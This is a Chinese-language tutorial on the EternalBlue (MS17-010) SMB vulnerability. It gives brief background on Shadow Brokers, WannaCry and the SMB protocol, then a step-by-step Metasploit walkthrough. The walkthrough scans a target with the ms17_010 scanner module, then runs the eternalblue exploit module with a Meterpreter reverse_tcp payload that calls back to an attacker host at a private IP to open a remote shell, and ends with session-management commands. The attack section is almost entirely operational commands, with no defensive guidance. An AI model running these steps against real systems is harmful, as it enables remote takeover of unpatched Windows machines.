一、永恒之蓝（MS17_010）

永恒之蓝

永恒之蓝是指2017年4月14日晚，黑客团体Shadow Brokers（影子经纪人）公布一大批网络攻击工具，其中包含“永恒之蓝”工具，“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日，不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招，被勒索支付高额赎金才能解密恢复文件。

恶意代码会扫描开放445文件共享端口的Windows机器，无需用户任何操作，只要开机上网，不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

EternalBlue(在微软的MS17-010中被修复)是在Windows的SMB服务处理SMB v1请求时发生的漏洞，这个漏洞导致攻击者在目标系统上可以执行任意代码。

SMB协议

SMB（全称是Server Message Block）是一个协议服务器信息块，它是一种客户机/服务器、请求/响应协议，通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源，电脑上的网上邻居就是靠SMB实现的；SMB协议工作在应用层和会话层，可以用在TCP/IP协议之上，SMB使用TCP139端口和TCP445端口。

---

二、漏洞利用–metasploit

利用Metasploit中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限

扫描端口，目标机开放445端口

启动msf
msfconsole

利用msf的auxiliary模块进行漏洞验证

1. 搜索有关漏洞的模块
   search ms17-010
   

2. 可以使用auxiliary/scanner/smb/smb_ms17_010 进行验证
   use auxiliary/scanner/smb/smb_ms17_010

3. 查看选项并填写需要的选项
   show options
set rhosts 192.168.3.78
   

4. 探测漏洞是否存在
   run
   

通过exploit模块利用漏洞

1. 查找攻击模块
   search ms17-010
   
2. 使用
   use exploit/windows/smb/ms17_010_eternalblue
3. 配置
   set rhost 192.168.3.78

设置payload

1. 查找payload
   show payload
   

2. 选择payload
   set payload windows/x64/meterpreter/reverse_tcp

3. 配置选项
   set lhost 192.168.3.59
   

4. 执行run

成功界面

拿到权限，可以执行某些命令（whoami等等）

其它

Exploit -j 保存到后台
使用sessions查看会话，通过sessions -i id进入会话

退出会话但不想断开连接，使用background退到后台

断开某个会话sessions -k id

解决乱码:chcp 65001(因为windows和Linux系统编码不一样)